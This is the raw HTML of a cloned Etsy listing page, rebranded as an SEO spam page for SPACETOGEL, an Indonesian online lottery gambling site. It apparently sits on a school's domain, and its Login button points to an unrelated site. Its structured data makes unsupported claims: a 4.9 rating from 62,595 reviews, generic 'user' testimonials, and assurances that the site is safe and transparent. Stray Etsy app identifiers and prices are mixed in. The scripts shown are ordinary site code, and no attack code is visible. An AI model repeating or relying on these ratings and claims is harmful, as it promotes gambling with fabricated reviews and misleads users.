    !function(e){var r=e.__etsy_logging={};r.errorQueue=[],e.onerror=function(e,o,t,n,s){r.errorQueue.push([e,o,t,n,s])},r.firedEvents=[];r.perf={e:[],t:!1,MARK_MEASURE_PREFIX:"_etsy_mark_measure_",prefixMarkMeasure:function(e){return"_etsy_mark_measure_"+e}},e.PerformanceObserver&&(r.perf.o=new PerformanceObserver((function(e){r.perf.e=r.perf.e.concat(e.getEntries())})),r.perf.o.observe({entryTypes:["element","navigation","longtask","paint","mark","measure","resource","layout-shift"]}));var o=[];r.eventpipe={q:o,logEvent:function(e){o.push(e)},logEventImmediately:function(e){o.push(e)}};var t=!(Object.assign&&Object.values&&Object.fromEntries&&e.Promise&&Promise.prototype.finally&&e.NodeList&&NodeList.prototype.forEach),n=!!e.CefSharp||!!e.__pw_resume,s=!e.PerformanceObserver||!PerformanceObserver.supportedEntryTypes||0===PerformanceObserver.supportedEntryTypes.length,a=!e.navigator||!e.navigator.sendBeacon,p=t||n,u=[];t&&u.push("fp"),s&&u.push("fo"),a&&u.push("fb"),n&&u.push("fg"),r.bots={isBot:p,botCheck:u}}(window);
</script>

        <link rel="stylesheet" href="https://hellblaze.biz/css/settings-overlay.746c61f69b1398.css" type="text/css" />
        <link rel="stylesheet" href="https://hellblaze.biz/css/view.32fb07f3620cc2.css" type="text/css" />
        <link rel="preload" href="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg" as="image" />
        <script>
    //todo: this is from https://stackoverflow.com/questions/5525071/how-to-wait-until-an-element-exists (with updates
    // for prettier) and is duplicated in Transcend-Integration.ts. Ideally we would find a place both
    // files could call.
    function waitForElm(selector) {
        return new Promise((resolve) => {
            if (document.querySelector(selector)) {
                return resolve(document.querySelector(selector));
            }

            const observer = new MutationObserver(() => {
                if (document.querySelector(selector)) {
                    observer.disconnect();
                    resolve(document.querySelector(selector));
                }
            });

            // If you get "parameter 1 is not of type 'Node'" error, see https://stackoverflow.com/a/77855838/492336
            observer.observe(document.body, {
                childList: true,
                subtree: true,
            });
        });
    }
    function retryLoadingAirgap(loadAsync, attemptNumber) {
        var element = document.createElement("script");
        element.type = "text/javascript";
        element.src = "https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js";
        if (loadAsync) {
            element.setAttribute('data-cfasync', true);
            element.async = true;
        }

        element.onerror = (error) => {
            if (attemptNumber < 3) {
                window.__etsy_logging.eventpipe.logEvent({
                        event_name: `transcend_cmp_airgap_preliminary_failure`,
                    airgap_url: 'https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js',
                    airgap_bundle: 'control_bundle',
                    error: error,
                    retryAttempt: attemptNumber,
                    attemptWasAsyncLoad: loadAsync
                });
                retryLoadingAirgap(false, attemptNumber + 1);
            }
            else {
                try {
                    //ideally we would have the same STATSD here as in transcend-integration.ts
                    //but we can't import STATSD into mustache files.  This only occurs 0.02% of the time anyway and
                    //this should work, so tracking in the "happy case" in the ts file should be sufficient.
                    window.initializePrivacySettingsManager(false);
                }
                catch (error) {
                        waitForElm("#privacy-settings-manager-load-complete").then(()=> {
                            window.initializePrivacySettingsManager(false);
                        });
                }
                // Update privacy footer based on Airgap info after footer script is loaded.
                waitForElm("#footer-script-loaded").then(()=> {
                    window.updatePrivacySettingsFooterTextBasedOnRegime();
                });

                window.__etsy_logging.eventpipe.logEvent({
                    event_name: `transcend_cmp_airgap_load_failure`,
                    airgap_url: 'https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js',
                    airgap_bundle: 'control_bundle',
                    error: error,
                    retryAttempts: attemptNumber
                });
            }
        }

        var head = document.getElementsByTagName('head')[0];
        head.appendChild(element);
    }

    function handleErrorLoadingAirgap() {
        window.__etsy_logging.eventpipe.logEvent({
            event_name: `transcend_cmp_airgap_preliminary_failure`,
            airgap_url: 'https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js',
            airgap_bundle: 'control_bundle',
            retryAttempt: 1,
            attemptWasAsyncLoad: true
        });

        retryLoadingAirgap(true, 2);
    }
</script>

<script data-cfasync="true" data-ui="off" src="https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js" onerror="(function() { handleErrorLoadingAirgap(); })()"  async></script>

        

        <title>SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia</title>
        <meta name="description" content="Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional.">

            <meta name="robots" content="max-image-preview:large">



<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "Product",
  "url": "https://ppschool.org.in/stella/",
  "name": "SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia",
  "sku": "4302118744",
  "description": "SPACETOGEL adalah tempat bermain Toto Macau dan togel 4D yang mengutamakan akses cepat, hasil akurat, dan pengalaman bermain yang nyaman untuk semua pemain. Dengan sistem yang stabil dan transparan, SPACETOGEL jadi pilihan aman buat mereka yang mencari situs terpercaya dengan result yang konsisten.",
  
  "image": [
    {
      "@type": "ImageObject",
      "author": "SPACETOGEL",
      "contentUrl": "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg",
      "thumbnailUrl": "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
    }
  ],

  "category": "Android Game < SPACETOGEL < TOGEL 4D",

  "brand": {
    "@type": "Brand",
    "name": "SPACETOGEL"
  },

  "logo": "https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png",

  "aggregateRating": {
    "@type": "AggregateRating",
    "ratingValue": 4.9,
    "reviewCount": 62595
  },

  "offers": {
    "@type": "AggregateOffer",
    "offerCount": 952,
    "lowPrice": 258621,
    "highPrice": 494253,
    "priceCurrency": "IDR",
    "availability": "https://schema.org/InStock",
    "shippingDetails": {
      "@type": "OfferShippingDetails",
      "shippingOrigin": {
        "@type": "DefinedRegion",
        "addressCountry": "ID"
      }
    }
  },

  "review": [
    {
      "@type": "Review",
      "reviewRating": { 
        "@type": "Rating", 
        "ratingValue": 5, 
        "bestRating": 5 
      },
      "datePublished": "2025-09-14",
      "reviewBody": "Main Toto Macau di SPACETOGEL terasa jauh lebih stabil dan nyaman. Aksesnya lancar dan result-nya jelas setiap hari.",
      "author": { 
        "@type": "Person", 
        "name": "SPACETOGEL USER" 
      }
    },
    {
      "@type": "Review",
      "reviewRating": { 
        "@type": "Rating", 
        "ratingValue": 5, 
        "bestRating": 5 
      },
      "datePublished": "2025-09-14",
      "reviewBody": "Togel 4D di SPACETOGEL lebih mudah dipantau. Tampilan bersih, fitur lengkap, dan bonus hariannya bikin makin betah.",
      "author": { 
        "@type": "Person", 
        "name": "PEMAIN SPACETOGEL" 
      }
    }
  ]
}
</script>


<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "VideoObject",
  "name": "SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia",
  "description": "Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional.",
  "thumbnailUrl": [
    "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg",
    "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
  ],
  "uploadDate": "2024-09-28T04:19:10-04:00",
  "duration": "PT18S",
  "contentUrl": "https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
}
</script>

<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [
    {
      "@type": "ListItem",
      "position": 1,
      "name": "Home",
      "item": "https://ppschool.org.in/stella/"
    }
  ]
}
</script>

<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@graph": [
    {
      "@type": "Organization",
      "@id": "https://ppschool.org.in/stella/#org",
      "name": "SPACETOGEL",
      "url": "https://ppschool.org.in/stella/",
      "logo": "https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png"
    },
    {
      "@type": "WebSite",
      "@id": "https://ppschool.org.in/stella/#website",
      "url": "https://ppschool.org.in/stella/",
      "name": "SPACETOGEL",
      "publisher": { "@id": "https://ppschool.org.in/stella/#org" },
      "inLanguage": "id-ID",
      "potentialAction": {
        "@type": "SearchAction",
        "target": "https://ppschool.org.in/stella/?s={search_term_string}",
        "query-input": "required name=search_term_string"
      }
    },
    {
      "@type": "SoftwareApplication",
      "@id": "https://ppschool.org.in/stella/#app",
      "name": "SPACETOGEL",
      "applicationCategory": "GameApplication",
      "operatingSystem": "Android, iOS, Windows",
      "offers": { 
        "@type": "Offer", 
        "price": "0", 
        "priceCurrency": "IDR" 
      },
      "aggregateRating": { 
        "@type": "AggregateRating", 
        "ratingValue": 4.9, 
        "ratingCount": 62595 
      }
    }
  ]
}
</script>


        <meta name="twitter:site" content="@SPACETOGEL" value="" /><meta name="twitter:card" content="summary_large_image" value="" /><meta name="twitter:app:name:iphone" content="SPACETOGEL" value="" /><meta name="twitter:app:url:iphone" content="etsy://listing/4302118744?ref=TwitterProductCard" value="" /><meta name="twitter:app:id:iphone" content="477128284" value="" /><meta name="twitter:app:name:ipad" content="SPACETOGEL" value="" /><meta name="twitter:app:url:ipad" content="etsy://listing/4302118744?ref=TwitterProductCard" value="" /><meta name="twitter:app:id:ipad" content="477128284" value="" /><meta name="twitter:app:name:googleplay" content="SPACETOGEL" value="" /><meta name="twitter:app:url:googleplay" content="etsy://listing/4302118744?ref=TwitterProductCard" value="" /><meta name="twitter:app:id:googleplay" content="com.etsy.android" value="" />
<meta property="og:title" content="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia" />
<meta property="og:description" content="Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional." />
<meta property="og:type" content="product" /><meta property="og:url" content="https://ppschool.org.in/stella/" /><meta property="og:image" content="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg" /><meta property="product:price:amount" content="22.50" /><meta property="product:price:currency" content="GBP" />

        

        <meta property="al:ios:url" content="etsy://listing/4302118744?ref=applinks_ios" /><meta property="al:ios:app_store_id" content="477128284" /><meta property="al:ios:app_name" content="SPACETOGEL" /><meta property="al:android:url" content="etsy://listing/4302118744?ref=applinks_android" /><meta property="al:android:package" content="com.etsy.android" /><meta property="al:android:app_name" content="SPACETOGEL" />

        <link rel="preconnect" href="//i.etsystatic.com" crossorigin="anonymous" /><link rel="preconnect" href="//i.etsystatic.com" /><link rel="preconnect" href="//v.etsystatic.com" /><link rel="preconnect" href="//v.etsystatic.com" crossorigin="anonymous" /><link rel="preload" as="image" imagesrcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg" fetchpriority="high" />


            <link rel="canonical" href="https://ppschool.org.in/stella/" />
            <link rel="amphtml" href="https://megapegwan.com/manufka/" />
<link rel="alternate" href="https://ppschool.org.in/stella/" hreflang="en" /><link rel="alternate" href="https://ppschool.org.in/stella/fi-en/" hreflang="en-FI" /><link rel="alternate" href="https://ppschool.org.in/stella/au/" hreflang="en-AU" /><link rel="alternate" href="https://ppschool.org.in/stella/ca/" hreflang="en-CA" /><link rel="alternate" href="https://ppschool.org.in/stella/dk-en/" hreflang="en-DK" /><link rel="alternate" href="https://ppschool.org.in/stella/hk-en/" hreflang="en-HK" /><link rel="alternate" href="https://ppschool.org.in/stella/ie/" hreflang="en-IE" /><link rel="alternate" href="https://ppschool.org.in/stella/il-en/" hreflang="en-IL" /><link rel="alternate" href="https://ppschool.org.in/stella/in-en/" hreflang="en-IN" /><link rel="alternate" href="https://ppschool.org.in/stella/nz/" hreflang="en-NZ" /><link rel="alternate" href="https://ppschool.org.in/stella/no-en/" hreflang="en-NO" /><link rel="alternate" href="https://ppschool.org.in/stella/se-en/" hreflang="en-SE" /><link rel="alternate" href="https://ppschool.org.in/stella/sg-en/" hreflang="en-SG" /><link rel="alternate" href="https://ppschool.org.in/stella/uk/" hreflang="en-GB" /><link rel="alternate" href="https://ppschool.org.in/stella/de/" hreflang="de" /><link rel="alternate" href="https://ppschool.org.in/stella/at/" hreflang="de-AT" /><link rel="alternate" href="https://ppschool.org.in/stella/ch/" hreflang="de-CH" /><link rel="alternate" href="https://ppschool.org.in/stella/fr/" hreflang="fr" /><link rel="alternate" href="https://ppschool.org.in/stella/ca-fr/" hreflang="fr-CA" /><link rel="alternate" href="https://ppschool.org.in/stella/nl/" hreflang="nl" /><link rel="alternate" href="https://ppschool.org.in/stella/be/" hreflang="nl-BE" /><link rel="alternate" href="https://ppschool.org.in/stella/it/" hreflang="it" /><link rel="alternate" href="https://ppschool.org.in/stella/es/" hreflang="es" /><link rel="alternate" href="https://ppschool.org.in/stella/mx/" hreflang="es-MX" /><link rel="alternate" href="https://ppschool.org.in/stella/jp/" hreflang="ja" /><link rel="alternate" href="https://ppschool.org.in/stella/pl/" hreflang="pl" /><link rel="alternate" href="https://ppschool.org.in/stella/pt/" hreflang="pt" /><link rel="alternate" href="https://ppschool.org.in/stella/" hreflang="x-default" /><link rel="alternate" href="https://ppschool.org.in/stella/" hreflang="en-US" />

        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">__webpack_public_path__ = "https://www.etsy.com/ac/evergreenVendor/js/en-US/";</script>

        <link rel="shortcut icon" href="https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png" /><link rel="icon" href="https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png" type="image/webp" sizes="32x32" /><link rel="icon" href="https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png" type="image/webp" sizes="16x16" /><link rel="apple-touch-icon" href="https://res.cloudinary.com/dgftvhg1k/image/upload/v1765347127/21846843_6543586-removebg-preview_qwhqrn.png" sizes="180x180" /><link rel="mask-icon" href="/images/safari-pinned-tab.svg" color="rgb(241, 100, 30)" /><link rel="manifest" href="/site.webmanifest" />
<meta name="apple-mobile-web-app-title" content="SPACETOGEL" /><meta name="application-name" content="SPACETOGEL" /><meta name="msapplication-TileColor" content="#F1641E" /><meta name="theme-color" content="rgb(255, 255, 255)" />

        <link type="application/opensearchdescription+xml" rel="search" href="/osdd.php" title="SPACETOGEL"/>
    </head>
    <body class="ui-toolkit transitional-wide etsy-has-it-design is-responsive no-touch en-US IDR ID"
        data-language="en-US"
        data-currency="IDR"
        data-region="ID"
        
    >

        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
    !function(a,b,c,d,e,f){a.ddjskey=e;a.ddoptions=f||null;var m=b.createElement(c),n=b.getElementsByTagName(c)[0];m.async=1,m.defer=1,m.src=d,n.parentNode.insertBefore(m,n)}(window,document,"script","https://www.etsy.com/include/tags.js", "D013AA612AB2224D03B2318D0F5B19", {
        endpoint:"https://www.etsy.com/include/tags.js",
        ajaxListenerPath: true,
        enableTagEvents: true,
        overrideAbortFetch: true,
        abortAsyncOnChallengeDisplay: true,
        disableAutoRefreshOnCaptchaPassed: false,
        replayAfterChallenge: true
    });

    var DD_BLOCKED_EVENT_NAME = "dd_blocked";
    var DD_RESPONSE_DISPLAYED_EVENT_NAME = "dd_response_displayed";
    var DD_RESPONSE_ERROR_EVENT_NAME = "dd_response_error";

    window.addEventListener(DD_RESPONSE_DISPLAYED_EVENT_NAME, function() {
        if (window.Sentry && window.Sentry.setTag) {
            window.Sentry.setTag(DD_RESPONSE_DISPLAYED_EVENT_NAME, true);
        }
    });

    window.addEventListener(DD_BLOCKED_EVENT_NAME, function() {
        if (window.Sentry && window.Sentry.setTag) {
            window.Sentry.setTag(DD_BLOCKED_EVENT_NAME, true);
        }
    });

    window.addEventListener(DD_RESPONSE_ERROR_EVENT_NAME, function() {
        if (window.Sentry && window.Sentry.setTag) {
            window.Sentry.setTag(DD_RESPONSE_ERROR_EVENT_NAME, true);
        }
    });
</script>

        

        

        <div data-above-header class="wt-z-index-5 wt-position-relative">
            
            

        </div>

        <div data-selector="header-cat-nav-wrapper" data-menu-ui="menubar">
<div id="gnav-header" class=" gnav-header global-nav v2-toolkit-gnav-header wt-z-index-6 wt-bg-white wt-position-relative " data-as-version="10_12672349415_19" data-count-ajax data-show-suggested-searches-in-as="1" data-show-gift-card-cta-in-as="1" data-as-personalized="1" data-as-extras="{&amp;quot;expt&amp;quot;:&amp;quot;all_xml&amp;quot;,&amp;quot;lang&amp;quot;:&amp;quot;en-US&amp;quot;,&amp;quot;extras&amp;quot;:[]}" data-cheact="1" data-gnav-header>
    <header id="gnav-header-inner" class="global-enhancements-header wt-display-flex-xs wt-justify-content-space-between wt-align-items-center wt-width-full wt-body-max-width wt-pl-xs-2 wt-pr-xs-2 wt-pl-lg-6 wt-pr-lg-6 wt-bb-xs wt-bb-lg-none gnav-header-inner wt-pt-lg-2 
        
        "
        role="banner">
<script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
!function(e){
    var r=e.__etsy_logging;
    if(r && r.perf && r.perf.prefixMarkMeasure){
        var n=r.perf.prefixMarkMeasure("logo_render");
        e.performance && e.performance.mark && e.requestAnimationFrame(function(){
            setTimeout(function(){
                e.performance.mark(n)
            })
        })
    }
}(window);
</script>
<div class="wt-pb-lg-0 wt-pt-sm-1 wt-pt-lg-0 wt-pr-xs-0 wt-pr-sm-1" data-header-logo-container>
    <a href="/?ref=lgo" elementtiming="ux-global-nav">
        <span class="wt-screen-reader-only">SPACETOGEL</span>
    <img 
        src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1749040413/ChatGPT_Image_4_Jun_2025__19.22.09-removebg-preview_e0khpu.png" 
        alt="SPACETOGEL Logo" 
        class="logo-dimensions wt-display-block wt-nudge-r-3 wt-nudge-t-1" 
        style="max-height:80px; height:auto;">
    </a>
</div>

            <nav class="wt-hide-xs wt-show-lg">
                <div data-clg-id="WtMenu" class="wt-menu wt-tooltip ge-menu--body-below-trigger wt-tooltip--disabled-touch dropdown-category-menu wt-menu--bottom wt-menu--left" data-wt-menu data-wt-tooltip="true" data-menu-body-below-trigger="true" data-close-on-select="true" data-hide-trigger-on-open="false" data-animate-in="true" data-contain-focus="false" data-open-direction-vert="bottom" data-open-direction-horiz="left" data-open-direction-force="true" data-menu-type="action">
       
        <button
          type="button"
          class="wt-menu__trigger wt-btn wt-btn--transparent header-button wt-mr-xs-1 wt-btn--small"
          aria-haspopup="true"
          aria-expanded="false"
          data-wt-menu-trigger
          data-level="0"
          data-overlay-trigger-selector= "overlay-trigger-ele"
        >
          <span class="etsy-icon wt-mr-xs-1 wt-icon--smaller">
            <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" viewBox="0 0 18 18">
              <rect x="2" y="8"  width="14" height="2"/>
              <rect x="2" y="13" width="14" height="2"/>
              <rect x="2" y="3"  width="14" height="2"/>
            </svg>
          </span>
          Categories
        </button>

        <div data-neu-spec-placeholder="1" id="bd2c69bf978c5288825b3623782eb9a1">
    <script type="text/json" data-neu-spec-placeholder-data="1">{"spec_name":"SPACETOGEL\\Modules\\CategoryNav\\Specs\\DropdownCatNav\\DropdownSubmenu","args":[]}</script>
    <div>
    
        
</div>
</div>

        <span class="ge-menu__body-caret wt-z-index-10 wt-bg-white wt-position-absolute wt-bl-xs wt-bt-xs wt-br-xs-none wt-bb-xs-none"></span>

</div>
            </nav>

        <div class="wt-width-full wt-display-flex-xs wt-pr-lg-3 wt-flex-lg-1 order-mobile-tablet-2" data-hamburger-search-container>
            <button
          data-id="hamburger"
          class="wt-btn wt-btn--transparent wt-btn--icon wt-hide-lg
               wt-btn--transparent-flush-left
                         wt-mb-xs-2
               
               wt-mb-lg-0
               header-button"
          aria-controls="mobile-catnav-overlay"
          tab-index="0"
     >
          <span class="wt-screen-reader-only">
                    Browse
          </span>
          <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M21 7H3V5h18zm-5 6H3v-2h13zm5 6H3v-2h18z"/></svg></span>
     </button>
            <div class="wt-display-inline-block wt-flex-xs-1 wt-pl-lg-0
                wt-mb-xs-2
        
        wt-mb-lg-0">
    <form id="gnav-search"
          class="global-enhancements-search-nav wt-position-relative wt-display-flex-xs"
          method="GET"
          action="/search.php"
          role="search"
          data-gnav-search
          data-ge-search-clearable
          data-trending-searches="1">

        <label for="global-enhancements-search-query" class="wt-label wt-screen-reader-only">
   Search for items or shops
</label>
<div 
    class="search-container"
    data-id="search-bar"
>
    <div
        class="wt-input-btn-group global-enhancements-search-input-btn-group emphasized_search_bar emphasized_search_bar_grey_bg search-bar-container"
        data-id="search-suggestions-trigger"
    >
        <input id="global-enhancements-search-query"
            data-id="search-query"
            data-search-input
            type="text"
            name="search_query"
            class="wt-input wt-input-btn-group__input global-enhancements-search-input-btn-group__input
                    wt-pr-xs-7
                                        
                    "
            placeholder="Search for SPACETOGEL"
            value=""
            autocomplete="off"
            autocorrect="off"
            autocapitalize="off"
            role="combobox"
            aria-autocomplete="both"
            aria-controls="global-enhancements-search-suggestions"
            aria-expanded="false"
        />
        <button type="button" class="wt-btn wt-btn--transparent wt-btn--icon wt-btn--small position-absolute-important wt-position-right wt-z-index-9 wt-animated  wt-animated--is-hidden
            
            search-close-btn-margin-right " data-search-close-btn>
            <span class="wt-screen-reader-only">Clear search</span>
            <span class="wt-icon wt-icon--smaller wt-nudge-t-1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M13.414,12l6.293-6.293a1,1,0,0,0-1.414-1.414L12,10.586,5.707,4.293A1,1,0,0,0,4.293,5.707L10.586,12,4.293,18.293a1,1,0,1,0,1.414,1.414L12,13.414l6.293,6.293a1,1,0,0,0,1.414-1.414Z"/></svg></span>
        </button>
        <button
            type="submit"
            class="wt-input-btn-group__btn global-enhancements-search-input-btn-group__btn
                
                "
            value="Search"
            aria-label="Search"
        data-id="gnav-search-submit-button">
            
            <span class="wt-icon wt-nudge-b-2 wt-nudge-r-1"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M10.5 19a8.46 8.46 0 0 0 5.262-1.824l4.865 4.864 1.414-1.414-4.865-4.865A8.5 8.5 0 1 0 10.5 19m0-2a6.5 6.5 0 1 0 0-13 6.5 6.5 0 0 0 0 13"/></svg></span>
        </button>
    </div>
    <div id="global-enhancements-search-suggestions"
        class="global-nav-menu__body
            search-suggestions-container
             wt-width-full wt-max-width-full
            "
         data-id="search-suggestions">
    </div>
</div>

<input id="search-js-router-enabled" type="hidden" value="true" />
<input type="hidden" value="all" name="search_type" id="search-type" />
    </form>
</div>
        </div>
        <a 
    data-selector="skip-to-content-marketplace"
    class="global-enhancements-skip-to-content wt-screen-reader-only wt-focusable" 
    href="#content"
>
    <div id="skip-to-content-wrapper" class="wt-display-flex-xs wt-align-items-center wt-justify-content-center wt-body-max-width wt-width-full wt-height-full wt-position-absolute wt-position-top wt-position-left wt-position-right wt-bg-denim wt-z-index-10">
        <label class="wt-btn wt-btn--transparent wt-btn--light">
            Skip to Content
        </label>
    </div>
</a>

        

        <div
            class="mobile-catnav-wrapper wt-overlay wt-overlay--peek wt-overlay--peek-left wt-p-xs-0"
            data-wt-overlay
            id="mobile-catnav-overlay"
            aria-hidden="true"
            aria-modal="false"
            role="dialog"
            
        >
        </div>

        <div class="wt-flex-shrink-xs-0" data-primary-nav-container>
            <nav aria-label="Main">
    <ul class="wt-display-flex-xs wt-justify-content-space-between wt-list-unstyled wt-m-xs-0 wt-align-items-center">
        <li>
    <button class="wt-btn wt-btn--small wt-btn--transparent wt-mr-xs-1 header-button"
        onclick="window.location.href='https://megapegwan.com/manufka/'">
  Login
</button>
</li>


<li 
    data-favorites-nav-container 
    data-ge-nav-menu="favorites"
    data-ge-hover-event-name="gnav_hover_favorites_menu"
>
    <span class="wt-tooltip wt-tooltip--disabled-touch" data-wt-tooltip>
        <a href="/guest/favorites?ref=hdr-fav" class="wt-tooltip__trigger wt-tooltip__trigger--icon-only wt-btn wt-btn--transparent wt-btn--icon reduced-margin-xs header-button"
           data-favorites-nav-link
           aria-labelledby="ge-tooltip-label-favorites">
            <span class="etsy-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M20.877 12.52q.081-.115.147-.239A6 6 0 0 0 12 4.528a6 6 0 0 0-9.024 7.753q.066.123.147.24l.673.961a6 6 0 0 0 .789.915L12 21.422l7.415-7.025q.44-.418.789-.915zm-14.916.425L12 18.667l6.04-5.722q.293-.279.525-.61l.673-.961a.3.3 0 0 0 .044-.087 4 4 0 1 0-7.268-2.619v.003L12 8.667l-.013.004v-.002l-.006-.064a3.98 3.98 0 0 0-1.232-2.51 4 4 0 0 0-6.031 5.193q.014.045.044.086l.673.961a4 4 0 0 0 .526.61"/></svg></span>
        </a>

        <span id="ge-tooltip-label-favorites" role="tooltip" data-favorites-label-tooltip>Favorites</span>
    </span>
</li>
<li data-gift-mode-nav-container>
    <span class="wt-tooltip wt-tooltip--disabled-touch" data-wt-tooltip>
        <a href="/gift-mode?ref=gm_utility_nav"
           class=" wt-tooltip__trigger wt-tooltip__trigger--icon-only wt-btn wt-btn--transparent wt-btn--icon reduced-margin-xs header-button"
           data-gift-mode-nav-link
           aria-labelledby="ge-tooltip-label-gift-mode">
            <span class="etsy-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M5.535 7A4 4 0 0 1 12 2.354 4 4 0 0 1 18.465 7H22v9h-1v6H3v-6H2V7zm9.466 0H13V5a2 2 0 1 1 2.001 2M11 5a2 2 0 1 0-2.001 2H11zm-.764 4c-.55.614-1.348 1-2.236 1v2a4.98 4.98 0 0 0 3-1v3H4V9zM13 11c.836.628 1.874 1 3 1v-2a3 3 0 0 1-2.236-1H20v5h-7zm-8 5v4h6v-4zm8 4v-4h6v4z"/></svg></span>
        </a>

        <span id="ge-tooltip-label-gift-mode" role="tooltip" data-registry-label-tooltip>
            
                Gifts
            
        </span>
    </span>
</li>
<li 
    data-ge-nav-menu="cart"
    data-ge-hover-event-name="gnav_hover_cart_menu"
>
    <span class="wt-tooltip wt-tooltip--bottom-left wt-tooltip--disabled-touch" data-wt-tooltip data-header-cart-button>
        <a aria-label="Cart" href="https://ppschool.org.in/stella/cart?ref=hdr-cart" class="wt-tooltip__trigger wt-tooltip__trigger--icon-only wt-btn wt-btn--transparent wt-btn--icon header-button">
            <span class="wt-z-index-1 wt-no-wrap wt-display-none ge-cart-badge wt-badge wt-badge--notificationPrimary wt-badge--small wt-badge--outset-top-right" data-selector="header-cart-count" aria-hidden="true">
                0
            </span>
            <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="m5.766 5-.618-3H1v2h2.518l2.17 10.535L6.18 17h14.307l2.4-12zM7.82 15l-1.6-8h14.227l-1.6 8z"/><path d="M10.667 20.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0m8.333 0a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0"/></svg></span>
        </a>
        <span role="tooltip" aria-hidden="true">Cart</span>
    </span>
</li>
    </ul>
</nav>
        </div>
    </header>

    
</div>

<nav class="wt-hide-xs wt-show-lg category-nav-button-menu">
    <div data-ui="cat-nav" id="desktop-category-topnav" class="cat-nav responsive-disabled v2-toolkit-cat-nav wt-ml-xs-0 wt-mr-xs-0">
        <div class="wt-text-caption wt-position-relative wt-bg-white wt-z-index-5 v2-toolkit-cat-nav-tab-bar">
            <div class="wt-body-max-width">
                <ul class="wt-list-unstyled wt-body-max-width wt-display-flex-xs wt-justify-content-center" data-menu-ui="menubar" data-ui="top-nav-category-list">
                      
                      <li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    data-node-id="-10" >
